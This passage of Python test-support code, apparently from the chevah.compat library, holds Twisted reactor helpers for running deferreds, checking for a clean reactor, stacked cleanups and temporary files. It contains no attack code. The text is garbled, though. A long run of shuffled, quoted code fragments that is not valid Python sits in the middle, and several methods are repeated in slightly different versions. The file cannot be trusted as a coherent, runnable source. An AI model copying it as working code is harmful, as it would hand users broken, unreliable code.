            self.assertStartsWith('211-Features:\n', result)
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        self._initiateTestReactor(timeout=timeout)

        # Set it to True to enter the first loop.
        have_callbacks = True
        while have_callbacks and not self._timeout_reached:
            self._iterateTestReactor(debug=debug)

            have_callbacks = False

            # Check for active jobs in the thread pool.
            if reactor.threadpool and (
                    reactor.threadpool.working or
                    (reactor.threadpool.q.qsize() > 0)
                    ):
                time.sleep(0.01)
                have_callbacks = True
                continue

            # Look at delayed calls.
            for delayed in reactor.getDelayedCalls():
                # We skip our own timeout call.
                if delayed is self._reactor_timeout_call:
                    continue
                if not delayed.func:
                    # Was already called.
                    continue
                delayed_str = self._getDelayedCallName(delayed)
                is_exception = False
                for excepted_callback in self.EXCEPTED_DELAYED_CALLS:
                    if excepted_callback in delayed_str:
                        is_exception = True
                if not is_exception:
                    # No need to look for other things as we already
                    # know that we need to wait at least for delayed
                    # calls.
                    have_callbacks = True
                    break

            if have_callbacks:
                continue

            if run_once:
                if have_callbacks:
                    raise AssertionError(
                        'Reactor queue still contains delayed deferred.\n'
                        '%s' % (self._reactorQueueToString()))
                break

            # Look at writers buffers:
            if len(reactor.getWriters()) > 0:
                have_callbacks = True
                continue

            for reader in reactor.getReaders():
                have_callbacks = True
                for excepted_reader in self.EXCEPTED_READERS:
                    if isinstance(reader, excepted_reader):
                        have_callbacks = False
                        break
                if have_callbacks:
                    break

            if have_callbacks:
                continue

        self._shutdownTestReactor()

    def executeDelayedCalls(self, timeout=None, debug=False):
        """
        Run the reactor until no more delayed calls are scheduled.

        This will wait for delayed calls to be executed and will not
        stop the reactor.
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        self._initiateTestReactor(timeout=timeout)
        while not self._timeout_reached:
            self._iterateTestReactor(debug=debug)
            delayed_calls = reactor.getDelayedCalls()
            try:
                delayed_calls.remove(self._reactor_timeout_call)
            except ValueError:  # noqa:cover
                # Timeout might be no longer be there.
                pass
            if not delayed_calls:
                break

        self._shutdownTestReactor(prevent_stop=True)

        if self._reactor_timeout_failure is not None:
            self._reactor_timeout_failure = None
            # We stop the reactor on failures.
            self._shutdownTestReactor()
            raise AssertionError(
                'executeDelayedCalls took more than %s' % (timeout,))

    def executeReactorUntil(
            self, callable, timeout=None, debug=False, prevent_stop=True):
        """
        Run the reactor until callable returns `True`.
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        self._initiateTestReactor(timeout=timeout)

        while not self._timeout_reached:
            self._iterateTestReactor(debug=debug)
            if callable(reactor):
                break

        self._shutdownTestReactor(prevent_stop=prevent_stop)

    def iterateReactor(self, count=1, timeout=None, debug=False):
        """
        Iterate the reactor without stopping it at the end.
        """
        iterations = [False] * (count - 1)
        iterations.append(True)
        self.executeReactorUntil(
            lambda _: iterations.pop(0), timeout=timeout, debug=debug)

    def iterateReactorWithStop(self, count=1, timeout=None, debug=False):
        """
        Iterate the reactor and stop it at the end.
        """
        iterations = [False] * (count - 1)
        iterations.append(True)
        self.executeReactorUntil(
            lambda _: iterations.pop(0),
            timeout=timeout,
            debug=debug,
            prevent_stop=False,
            )

    def iterateReactorForSeconds(self, duration=1, debug=False):
        """
        Iterate the reactor for `duration` seconds.
        """
        start = time.time()
        self.executeReactorUntil(
            lambda _: time.time() - start > duration,
            timeout=duration + 0.1,
            debug=debug,
            prevent_stop=False,
            )

    def _getDelayedCallName(self, delayed_call):
        """
        Return a string representation of the delayed call.
        """
        raw_name = text_type(delayed_call.func)
        raw_name = raw_name.replace('<function ', '')
        raw_name = raw_name.replace('<bound method ', '')
        return raw_name.split(' ', 1)[0]
    def getDeferredFailure(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        Run the deferred and return the failure.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            failure = self.getDeferredFailure(deferred)

            self.assertFailureType(AuthenticationError, failure)
        """
        self._runDeferred(
            deferred,
            timeout=timeout,
            debug=debug,
            prevent_stop=prevent_stop,
            )
        self.assertIsFailure(deferred)
        failure = deferred.result
        self.ignoreFailure(deferred)
        return failure

    def getDeferredResult(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        Run the deferred and return the result.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            result = self.getDeferredResult(deferred)
        """
        self._runDeferred(
            deferred,
            timeout=timeout,
            debug=debug,
            prevent_stop=prevent_stop,
            )
        self.assertIsNotFailure(deferred)
        return deferred.result

    def successResultOf(self, deferred):
        """
        Return the current success result of C{deferred} or raise
        C{self.failException}.

        @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
            which has a success result.
            This means
            L{Deferred.callback<twisted.internet.defer.Deferred.callback>}
            or
            L{Deferred.errback<twisted.internet.defer.Deferred.errback>}
            has been called on it and it has reached the end of its
            callback chain and the last callback or errback returned a
            non-L{failure.Failure}.
        @type deferred: L{Deferred<twisted.internet.defer.Deferred>}

        @raise SynchronousTestCase.failureException: If the
            L{Deferred<twisted.internet.defer.Deferred>} has no result
            or has a failure result.

        @return: The result of C{deferred}.
        """
        # FIXME:1370:
        # Remove / re-route this code after upgrading to Twisted 13.
        result = []
        deferred.addBoth(result.append)

        if not result:
            self.fail(
                "Success result expected on %r, "
                "found no result instead" % (deferred,))
        elif isinstance(result[0], Failure):
            self.fail(
                "Success result expected on %r, "
                "found failure result instead:\n%s" % (
                    deferred,
                    result[0].getBriefTraceback().decode(
                        'utf-8', errors='replace')))
        else:
            return result[0]

    def failureResultOf(self, deferred, *expectedExceptionTypes):
        """
        Return the current failure result of C{deferred} or raise
        C{self.failException}.

        @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
            which has a failure result.
            This means
            L{Deferred.callback<twisted.internet.defer.Deferred.callback>}
            or
            L{Deferred.errback<twisted.internet.defer.Deferred.errback>}
            has been called on it and it has reached the end of its
            callback chain and the last callback or errback raised an
            exception or returned a L{failure.Failure}.
        @type deferred: L{Deferred<twisted.internet.defer.Deferred>}

        @param expectedExceptionTypes: Exception types to expect - if
            provided, and the exception wrapped by the failure result is
            not one of the types provided, then this test will fail.

        @raise SynchronousTestCase.failureException: If the
            L{Deferred<twisted.internet.defer.Deferred>} has no result,
            has a success result, or has an unexpected failure result.

        @return: The failure result of C{deferred}.
        @rtype: L{failure.Failure}
        """
        # FIXME:1370:
        # Remove / re-route this code after upgrading to Twisted 13.
        result = []
        deferred.addBoth(result.append)

        if not result:
            self.fail(
                "Failure result expected on %r, "
                "found no result instead" % (deferred,))
        elif not isinstance(result[0], Failure):
            self.fail(
                "Failure result expected on %r, "
                "found success result (%r) instead" % (deferred, result[0]))
        elif (expectedExceptionTypes and
                not result[0].check(*expectedExceptionTypes)):
            expectedString = " or ".join([
                '.'.join((t.__module__, t.__name__))
                for t in expectedExceptionTypes])
            self.fail(
                "Failure of type (%s) expected on %r, "
                "found type %r instead: %s" % (
                    expectedString, deferred, result[0].type,
                    result[0].getBriefTraceback().decode(
                        'utf-8', errors='replace')))
        else:
            return result[0]

    def assertNoResult(self, deferred):
        """
        Assert that C{deferred} does not have a result at this point.

        If the assertion succeeds, then the result of C{deferred} is
        left unchanged. Otherwise, any L{failure.Failure} result is
        swallowed.

        @param deferred: A L{Deferred<twisted.internet.defer.Deferred>}
            without a result.
            This means that neither
            L{Deferred.callback<twisted.internet.defer.Deferred.callback>}
            nor
            L{Deferred.errback<twisted.internet.defer.Deferred.errback>}
            has been called, or that the
            L{Deferred<twisted.internet.defer.Deferred>} is waiting on
            another L{Deferred<twisted.internet.defer.Deferred>} for a
            result.
        @type deferred: L{Deferred<twisted.internet.defer.Deferred>}

        @raise SynchronousTestCase.failureException: If the
            L{Deferred<twisted.internet.defer.Deferred>} has a result.
        """
        # FIXME:1370:
        # Remove / re-route this code after upgrading to Twisted 13.
        result = []

        def cb(res):
            result.append(res)
            return res

        deferred.addBoth(cb)
        if result:
            # If there is already a failure, the self.fail below will
            # report it, so swallow it in the deferred.
            deferred.addErrback(lambda _: None)
            self.fail(
                "No result expected on %r, found %r instead" % (
                    deferred, result[0]))

    def assertWasCalled(self, deferred):
        """
        Check that deferred was called.
        """
        if not deferred.called:
            raise AssertionError('This deferred was not called yet.')

    def ignoreFailure(self, deferred):
        """
        Ignore the current failure on the deferred.

        It transforms a failure into result `None` so that the failure
        will not be raised at reactor shutdown for not being handled.
        """
        deferred.addErrback(lambda failure: None)

    def assertIsFailure(self, deferred):
        """
        Check that deferred is a failure.
        """
        if not isinstance(deferred.result, Failure):
            raise AssertionError('Deferred is not a failure.')

    def assertIsNotFailure(self, deferred):
        """
        Raise assertion error if deferred is a Failure.

        The failed deferred is handled by this method, to avoid
        propagating the error into the reactor.
        """
        self.assertWasCalled(deferred)

        if isinstance(deferred.result, Failure):
            error = deferred.result
            self.ignoreFailure(deferred)
            raise AssertionError(
                'Deferred contains a failure: %s' % (error))
class ChevahTestCase(TwistedTestCase, AssertionMixin):
    """
    Test case for Chevah tests.

    Checks that the temporary folder is clean at exit.
    """

    os_name = process_capabilities.os_name
    os_family = process_capabilities.os_family
    os_version = _get_os_version()
    cpu_type = process_capabilities.cpu_type
    ci_name = _get_ci_name()
    CI = _CI_NAMES
    TEST_LANGUAGE = os.getenv('TEST_LANG', 'EN')

    # List of partial thread names to ignore during the tearDown.
    # No need for the full thread name.
    excepted_threads = [
        'MainThread',
        'threaded_reactor',
        'GlobalPool-WorkerHandler',
        'GlobalPool-TaskHandler',
        'GlobalPool-ResultHandler',
        'PoolThread-twisted.internet.reactor',
        ]

    # We assume that hostname does not change during test and this
    # should save a few DNS queries.
    hostname = _get_hostname()

    Bunch = Bunch
    Mock = Mock
    #: Obsolete. Please use self.patch and self.patchObject.
    Patch = patch

    _environ_user = None
    _drop_user = '-'

    def setUp(self):
        super(ChevahTestCase, self).setUp()
        self.__cleanup__ = []
        self._cleanup_stack = []
        self._teardown_errors = []
        self.test_segments = None

    def tearDown(self):
        self.callCleanup()
        self._checkTemporaryFiles()

        threads = threading.enumerate()
        if len(threads) > 1:
            for thread in threads:
                thread_name = thread.getName()
                if self._isExceptedThread(thread_name):
                    continue
                self._teardown_errors.append(AssertionError(
                    'There are still active threads, '
                    'beside the main thread: %s - %s' % (
                        thread_name, threads)))

        super(ChevahTestCase, self).tearDown()

        errors, self._teardown_errors = self._teardown_errors, None
        if errors:
            raise AssertionError('Cleanup errors: %r' % (errors,))

    def _isExceptedThread(self, name):
        """
        Return `True` if it is OK for the thread to exist after the test
        is done.
        """
        for exception in self.excepted_threads:
            if name in exception:
                return True

            if exception in name:
                return True

        return False

    def addCleanup(self, function, *args, **kwargs):
        """
        Overwrite unit-test behaviour to run cleanup method before
        tearDown.
        """
        self.__cleanup__.append((function, args, kwargs))

    def callCleanup(self):
        """
        Call all cleanup methods.

        If a cleanup fails, the next cleanups will continue to be
        called and the first failure is raised.
        """
        first_error = None
        for function, args, kwargs in reversed(self.__cleanup__):
            try:
                function(*args, **kwargs)
            except Exception as error:  # noqa:cover
                if first_error is None:
                    first_error = error

        self.__cleanup__ = []

        if first_error is not None:
            raise first_error

    def enterCleanup(self):
        """
        Start a new set of stacked cleanups.
        """
        self._cleanup_stack.append(self.__cleanup__)
        self.__cleanup__ = []

    def exitCleanup(self):
        """
        To be called at the end of a stacked cleanup.
        """
        self.callCleanup()
        self.__cleanup__ = self._cleanup_stack.pop()

    @contextlib.contextmanager
    def stackedCleanup(self):
        """
        Context manager for stacked cleanups.
        """
        try:
            self.enterCleanup()
            yield
        finally:
            self.exitCleanup()

    def _checkTemporaryFiles(self):
        """
        Check that no temporary files or folders are present.
        """
        # FIXME:922:
        # Move all filesystem checks into a specialized class.
        if self.test_segments:
            if mk.fs.isFolder(self.test_segments):
                mk.fs.deleteFolder(
                    self.test_segments, recursive=True)
            else:
                mk.fs.deleteFile(self.test_segments)

        checks = [
            self.assertTempIsClean,
            self.assertWorkingFolderIsClean,
            ]

        errors = []
        for check in checks:
            try:
                check()
            except AssertionError as error:
                errors.append(error.message)

        if errors:  # noqa:cover
            self._teardown_errors.append(AssertionError(
                'There are temporary files or folders left over.\n %s' % (
                    '\n'.join(errors))))

    def shortDescription(self):  # noqa:cover
        """
        The short description for the test.

        bla.bla.tests. is removed.
        The format is customized for the Chevah Nose runner.

        This is only called when we run with -v or we show the error.
        """
        class_name = text_type(self.__class__)[8:-2]
        class_name = class_name.replace('.Test', ':Test')
        tests_start = class_name.find('.tests.') + 7
        class_name = class_name[tests_start:]

        return "%s - %s.%s" % (
            self._testMethodName,
            class_name,
            self._testMethodName,
            )

    def assertRaises(self, exception_class, callback=None, *args, **kwargs):
        """
        Wrapper around the stdlib call to allow non-context usage.
        """
        super_assertRaises = super(ChevahTestCase, self).assertRaises
        if callback is None:
            return super_assertRaises(exception_class)

        with super_assertRaises(exception_class) as context:
            callback(*args, **kwargs)

        return context.exception
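    # Usage sketch for the stacked cleanup helpers above
    # (`make_resource` is a hypothetical factory):
    #
    #   def test_scoped_cleanup(self):
    #       outer = make_resource()
    #       self.addCleanup(outer.close)       # runs at tearDown
    #
    #       with self.stackedCleanup():
    #           inner = make_resource()
    #           self.addCleanup(inner.close)
    #       # `inner.close` already ran when the `with` block exited,
    #       # while `outer.close` is still pending for tearDown.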
    def assertSequenceEqual(self, first, second, msg, seq_type):
        super(ChevahTestCase, self).assertSequenceEqual(
            first, second, msg, seq_type)

        for first_element, second_element in zip(first, second):
            self.assertEqual(first_element, second_element)

    def assertDictEqual(self, first, second, msg):
        super(ChevahTestCase, self).assertDictEqual(first, second, msg)

        first_keys = sorted(first.keys())
        second_keys = sorted(second.keys())
        first_values = [first[key] for key in first_keys]
        second_values = [second[key] for key in second_keys]
        self.assertSequenceEqual(first_keys, second_keys, msg, list)
        self.assertSequenceEqual(first_values, second_values, msg, list)

    def assertSetEqual(self, first, second, msg):
        super(ChevahTestCase, self).assertSetEqual(first, second, msg)

        first_elements = sorted(first)
        second_elements = sorted(second)
        self.assertSequenceEqual(
            first_elements, second_elements, msg, list)

    def _baseAssertEqual(self, first, second, msg=None):
        """
        Update to stdlib to make sure we don't compare str with unicode.
        """
        if (
                isinstance(first, str) and
                isinstance(second, text_type)
                ):  # noqa:cover
            if not msg:
                msg = u'First is str while second is unicode for "%s".' % (
                    first,)
            raise AssertionError(msg.encode('utf-8'))

        return super(ChevahTestCase, self)._baseAssertEqual(
            first, second, msg=msg)

    @staticmethod
    def getHostname():
        """
        Return the hostname of the current system.
        """
        return _get_hostname()

    @classmethod
    def initialize(cls, drop_user):
        """
        Initialize the testing environment.
        """
        cls._drop_user = drop_user
        os.environ['DROP_USER'] = drop_user

        if 'LOGNAME' in os.environ and 'USER' not in os.environ:
            os.environ['USER'] = os.environ['LOGNAME']

        if 'USER' in os.environ and 'USERNAME' not in os.environ:
            os.environ['USERNAME'] = os.environ['USER']

        if 'USERNAME' in os.environ and 'USER' not in os.environ:
            os.environ['USER'] = os.environ['USERNAME']

        cls._environ_user = os.environ['USER']

    @classmethod
    def dropPrivileges(cls):
        '''Drop privileges to normal users.'''
        if cls._drop_user == '-':
            return

        os.environ['USERNAME'] = cls._drop_user
        os.environ['USER'] = cls._drop_user
        # Test suite should be started as root and we drop effective
        # user privileges.
        system_users.dropPrivileges(username=cls._drop_user)

    @staticmethod
    def skipTest(message=''):
        '''Return a SkipTest exception.'''
        return SkipTest(message)

    @property
    def _caller_success_member(self):
        '''Retrieve the 'success' member from the test case.'''
        success = None
        for level in inspect.stack()[1:]:
            try:
                success = level[0].f_locals['success']
                break
            except KeyError:
                success = None

        if success is None:
            raise AssertionError('Failed to find "success" attribute.')

        return success

    @staticmethod
    def patch(*args, **kwargs):
        """
        Helper for generic patching.
        """
        return patch(*args, **kwargs)

    @staticmethod
    def patchObject(*args, **kwargs):
        """
        Helper for patching object members.
        """
        return patch.object(*args, **kwargs)

    def now(self):
        """
        Return current Unix timestamp.
        """
        return time.time()

    @classmethod
    def cleanTemporaryFolder(cls):
        """
        Clean all test files from the temporary folder.

        Return a list of members which were removed.
        """
        return cls._cleanFolder(mk.fs.temp_segments)

    @classmethod
    def cleanWorkingFolder(cls):
        path = mk.fs.getAbsoluteRealPath('.')
        segments = mk.fs.getSegmentsFromRealPath(path)
        return cls._cleanFolder(segments, only_marked=True)

    @classmethod
    def _cleanFolder(cls, folder_segments, only_marked=False):
        """
        Clean all test files from folder_segments.

        Return a list of members which were removed.
        """
        if not mk.fs.exists(folder_segments):
            return []

        # In case we are running the test suite as super user,
        # we use super filesystem for cleaning.
        if cls._environ_user == cls._drop_user:
            temp_avatar = SuperAvatar()
        else:
            temp_avatar = DefaultAvatar()

        temp_filesystem = LocalFilesystem(avatar=temp_avatar)
        temp_members = []
        for member in (temp_filesystem.getFolderContent(folder_segments)):
            if only_marked and member.find(TEST_NAME_MARKER) == -1:
                continue
            temp_members.append(member)
            segments = folder_segments[:]
            segments.append(member)
            if temp_filesystem.isFolder(segments):
                temp_filesystem.deleteFolder(segments, recursive=True)
            else:
                temp_filesystem.deleteFile(segments)

        return temp_members

    @classmethod
    def getPeakMemoryUsage(cls):
        """
        Return maximum memory usage in kilo bytes.
        """
        if cls.os_family == 'posix':
            import resource
            return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
        elif cls.os_family == 'nt':
            from wmi import WMI
            local_wmi = WMI('.')

            query = (
                u'SELECT PeakWorkingSetSize '
                u'FROM Win32_Process '
                u'WHERE Handle=%d' % os.getpid())
            result = local_wmi.query(query.encode('utf-8'))
            peak_working_set_size = int(result[0].PeakWorkingSetSize)
            # FIXME:2099:
            # Windows XP reports value in bytes, instead of Kilobytes.
            return int(peak_working_set_size)
        else:
            raise AssertionError('OS not supported.')

    def folderInTemp(self, *args, **kwargs):
        """
        Create a folder in the default temp folder and mark it for
        cleanup.
        """
        kwargs['cleanup'] = self.addCleanup
        return mk.fs.folderInTemp(*args, **kwargs)

    def fileInTemp(self, *args, **kwargs):
        """
        Create a file in the default temp folder and mark it for
        cleanup.
        """
        kwargs['cleanup'] = self.addCleanup
        return mk.fs.fileInTemp(*args, **kwargs)

    def assertIn(self, target, source):
        """
        Overwrite stdlib assertIn to swap the arguments.
        """
        if source not in target:
            message = u'%s not in %s.' % (repr(source), repr(target))
            raise AssertionError(message.encode('utf-8'))

    def assertIsInstance(self, expected_type, value, msg=None):
        """
        Raise an assertion error if `value` is not an instance of
        `expected_type`.
        """
        # In Python 2.7 assertIsInstance is already defined, but with
        # swapped arguments.
        if not inspect.isclass(expected_type):
            expected_type, value = value, expected_type

        if not isinstance(value, expected_type):
            raise AssertionError(
                "Expecting type %s, but got %s. %s" % (
                    expected_type, type(value), msg))

    def tempPath(self, prefix='', suffix=''):
        """
        Return (path, segments) for a path which is not created yet.
        """
        return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix)

    def tempPathCleanup(self, prefix='', suffix=''):
        """
        Return (path, segments) for a path which is not created yet but
        which will be automatically removed.
        """
        return mk.fs.pathInTemp(
            cleanup=self.addCleanup, prefix=prefix, suffix=suffix)

    def tempFile(self, content='', prefix='', suffix='', cleanup=True):
        """
        Return (path, segments) for a new file created in temp which is
        auto cleaned.
        """
        segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix)
        path = mk.fs.getRealPathFromSegments(segments)

        if cleanup:
            self.addCleanup(mk.fs.deleteFile, segments)

        try:
            opened_file = mk.fs.openFileForWriting(segments)
            opened_file.write(content)
        finally:
            opened_file.close()

        return (path, segments)

    def tempFolder(self, name=None, prefix='', suffix=''):
        """
        Create a new temp folder and return its (path, segments).

        The folder is removed at cleanup.
        """
        segments = mk.fs.createFolderInTemp(
            foldername=name, prefix=prefix, suffix=suffix)
        path = mk.fs.getRealPathFromSegments(segments)
        self.addCleanup(mk.fs.deleteFolder, segments, recursive=True)
        return (path, segments)
In most tests you would like to", "try: self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that", "== -1: continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments):", "below 2.7 we use the separate unittest2 module. # It", "raise AssertionError('Failed to find \"success\" attribute.') return success_state @staticmethod def", "have_callbacks = True while have_callbacks and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks", "for file system testing. \"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user", "stopped.') # Look at threads queue. if len(reactor.threadCallQueue) > 0:", "segments) for a new file created in temp which is", "None test case. \"\"\" success = None for i in", "or empty list when threadpool does not exists. \"\"\" if", "Failure except ImportError: # Twisted support is optional. _SocketWaker =", "This is only called when we run with -v or", "import mk from chevah.compat.testing.constant import ( TEST_NAME_MARKER, ) from chevah.compat.testing.filesystem", "reactor.threadpool: return [] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return", "= u'%s not in %s.' % (repr(source), repr(target)) raise AssertionError(message.encode('utf-8'))", "which is auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix,", "from twisted.internet import reactor except ImportError: reactor = None def", "that the reactor has no delayed calls, readers or writers.", "to wait for a deferred to have a result. DEFERRED_TIMEOUT", "# code which is executed from another thread. # removeAll", "for them when running the reactor. EXCEPTED_DELAYED_CALLS = [] EXCEPTED_READERS", "= platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1]) if os_name ==", "are still active threads, ' 'beside the main thread: %s", "(path, segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\" Create a", "you would like to use `getDeferredFailure` or `getDeferredResult`. Run the", "success def tearDown(self): try: if self._caller_success_member: # Check for a", "executed from another thread. # removeAll might fail since it", "look for other things as we already know that we", "return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot', UNKNOWN='unknown-ci',", "least for delayed calls. if have_callbacks: continue if run_once: if", "when we can not find the home folder path. if", "reactor.running and t2 reactor.doIteration(t) else: # FIXME:4428: # When not", "\"\"\" from chevah.compat.testing import TEST_ACCOUNT_GROUP user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return", "return 'x64' return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis',", "that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called, or that", "else: from unittest import TestCase try: # Import reactor last", "longer be there. pass if not delayed_calls: break self._shutdownTestReactor(prevent_stop=True) if", "arguments. 
    def _initiateTestReactor(self, timeout):
        """
        Do the steps required to initiate a reactor for testing.
        """
        self._timeout_reached = False

        # Set up timeout.
        self._reactor_timeout_call = reactor.callLater(
            timeout, self._raiseReactorTimeoutError, timeout)

        # Don't start the reactor if it is already started.
        # This can happen if we prevent stop in a previous run.
        if reactor._started:
            return

        reactor._startedBefore = False
        reactor._started = False
        reactor._justStopped = False
        reactor.startRunning()

    def _iterateTestReactor(self, debug=False):
        """
        Iterate the reactor.
        """
        reactor.runUntilCurrent()
        if debug:  # noqa:cover
            # When debug is enabled, iterate using a small delay in steps,
            # to have a much better debug output.
            # Otherwise the debug messages will flood the output.
            print((
                self._reactorQueueToString(),
                reactor.threadCallQueue,
                reactor.getWriters(),
                reactor.getReaders(),
                reactor.getThreadPool().q.qsize(),
                self._threadPoolThreads(),
                self._threadPoolWorking(),
                ))
            t2 = reactor.timeout()
            # For testing we want to force the reactor to wake at an
            # interval of at most 1 second.
            if t2 is None or t2 > 1:
                t2 = 0.1
            t = reactor.running and t2
            reactor.doIteration(t)
        else:
            # FIXME:4428:
            # When not executed in debug mode, some tests fail if the
            # reactor is iterated with a large delay.
            # To not slow down all the tests, we run with a very small
            # value.
            reactor.doIteration(0.000001)

    def _shutdownTestReactor(self, prevent_stop=False):
        """
        Called at the end of a test reactor run.

        When prevent_stop=True, the reactor will not be stopped.
        """
        if not self._timeout_reached:
            # Everything fine, disable timeout.
            if (
                self._reactor_timeout_call and
                    not self._reactor_timeout_call.cancelled
                    ):
                self._reactor_timeout_call.cancel()

        if prevent_stop:
            # Don't continue with stop procedure.
            return

        # Let the reactor know that we want to stop reactor.
        reactor.stop()
        # Let the reactor run one more time to execute the stop code.
        reactor.iterate()

        # Set flag to fake a clean reactor.
        reactor._startedBefore = False
        reactor._started = False
        reactor._justStopped = False

        # Start running has consumed the startup events, so we need
        # to restore them.
        reactor.addSystemEventTrigger(
            'during', 'startup', reactor._reallyStartRunning)

    def _assertReactorIsClean(self):
        """
        Check that the reactor has no delayed calls, readers or writers.
        """
        if reactor is None:
            return

        def raise_failure(location, reason):
            raise AssertionError(
                'Reactor is not clean. %s: %s' % (location, reason))

        if reactor._started:  # noqa:cover
            # Reactor was not stopped, so stop it before raising the
            # error.
            self._shutdownTestReactor()
            raise AssertionError('Reactor was not stopped.')

        # Look at threads queue.
        if len(reactor.threadCallQueue) > 0:
            raise_failure('queued threads', reactor.threadCallQueue)

        if reactor.threadpool and len(reactor.threadpool.working) > 0:
            raise_failure('active threads', reactor.threadCallQueue)

        pool_queue = self._threadPoolQueue()
        if pool_queue:
            raise_failure('threadpoool queue', pool_queue)

        if self._threadPoolWorking():
            raise_failure('threadpoool working', self._threadPoolWorking())

        if len(reactor.getWriters()) > 0:  # noqa:cover
            raise_failure('writers', text_type(reactor.getWriters()))

        for reader in reactor.getReaders():
            excepted = False
            for reader_type in self.EXCEPTED_READERS:
                if isinstance(reader, reader_type):
                    excepted = True
                    break
            if not excepted:  # noqa:cover
                raise_failure('readers', text_type(reactor.getReaders()))

        for delayed_call in reactor.getDelayedCalls():
            if delayed_call.active():
                delayed_str = self._getDelayedCallName(delayed_call)
                if delayed_str in self.EXCEPTED_DELAYED_CALLS:
                    continue
                raise_failure('delayed calls', delayed_str)
    def _runDeferred(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        This is a low level method.  In most tests you would like to use
        `getDeferredFailure` or `getDeferredResult`.

        Run the deferred in the reactor loop.

        Starts the reactor, waits for deferred execution, raises an error
        on timeout, and stops the reactor.

        It will re-execute while the result is itself a deferred, to get
        the "root" deferred.

        Usage::

            checker = mk.credentialsChecker()
            credentials = mk.credentials()

            deferred = checker.requestAvatarId(credentials)
            self._runDeferred(deferred)

            self.assertIsNotFailure(deferred)
            self.assertEqual('something', deferred.result)
        """
        if not isinstance(deferred, Deferred):
            raise AssertionError('This is not a deferred.')

        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        try:
            self._initiateTestReactor(timeout=timeout)
            self._executeDeferred(deferred, timeout, debug=debug)
        finally:
            self._shutdownTestReactor(
                prevent_stop=prevent_stop)

    def _executeDeferred(self, deferred, timeout, debug):
        """
        Do the actual deferred execution.
        """
        if not deferred.called:
            deferred_done = [False]

            def _mark_done(result):
                deferred_done[0] = True
                return result
            deferred.addBoth(_mark_done)

            while not self._timeout_reached and not deferred_done[0]:
                self._iterateTestReactor(debug=debug)

        if self._timeout_reached:
            raise AssertionError(
                'Deferred took more than %d to execute.' % timeout)

        # Check executing all deferreds from the chained callbacks.
        result = deferred.result
        while isinstance(result, Deferred):
            self._executeDeferred(result, timeout=timeout, debug=debug)
            result = deferred.result

    def executeReactor(self, timeout=None, debug=False, run_once=False):
        """
        Run reactor until no more delayed calls, readers or writers or
        threads are in the queues.

        Set run_once=True to only run the reactor once.

        Usage::

            protocol.makeConnection(transport)
            transport.protocol = protocol
            protocol.lineReceived('FEAT')

            self.executeReactor()
            result = transport.value()

            self.assertStartsWith('211-Features:\n', result)
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT

        self._initiateTestReactor(timeout=timeout)

        # Set it to True to enter the first loop.
        have_callbacks = True
        while have_callbacks and not self._timeout_reached:
            self._iterateTestReactor(debug=debug)

            have_callbacks = False

            # Check for active jobs in thread pool.
            if reactor.threadpool:
                if (
                    reactor.threadpool.working or
                        (reactor.threadpool.q.qsize() > 0)
                        ):
                    time.sleep(0.01)
                    have_callbacks = True
                    continue

            # Look at delayed calls.
            for delayed in reactor.getDelayedCalls():
                # We skip our own timeout call.
                if delayed is self._reactor_timeout_call:
                    continue
                if not delayed.func:
                    # Was already called.
                    continue
                delayed_str = self._getDelayedCallName(delayed)
                is_exception = False
                for excepted_callback in self.EXCEPTED_DELAYED_CALLS:
                    if excepted_callback in delayed_str:
                        is_exception = True
                if not is_exception:
                    # No need to look for other delayed calls.
                    have_callbacks = True
                    break

            # No need to look for other things as we already know that we
            # need to wait at least for delayed calls.
            if have_callbacks:
                continue

            if run_once:
                if have_callbacks:
                    raise AssertionError(
                        'Reactor queue still contains delayed deferred.\n'
                        '%s' % (self._reactorQueueToString()))
                break

            # Look at writers buffers:
            if len(reactor.getWriters()) > 0:
                have_callbacks = True
                continue

            for reader in reactor.getReaders():
                have_callbacks = True
                for excepted_reader in self.EXCEPTED_READERS:
                    if isinstance(reader, excepted_reader):
                        have_callbacks = False
                        break
                if have_callbacks:
                    break

            if have_callbacks:
                continue

            # Look at threads queue and active threads.
            if len(reactor.threadCallQueue) > 0:
                have_callbacks = True
                continue
            if reactor.threadpool and len(reactor.threadpool.working) > 0:
                have_callbacks = True
                continue

        self._shutdownTestReactor()

    def executeDelayedCalls(self, timeout=None, debug=False):
        """
        Run the reactor until no more delayed calls are scheduled.

        This will wait for delayed calls to be executed and will not
        stop the reactor.
        """
        if timeout is None:
            timeout = self.DEFERRED_TIMEOUT
        self._initiateTestReactor(timeout=timeout)
        while not self._timeout_reached:
            self._iterateTestReactor(debug=debug)
            delayed_calls = reactor.getDelayedCalls()
            try:
                delayed_calls.remove(self._reactor_timeout_call)
            except ValueError:  # noqa:cover
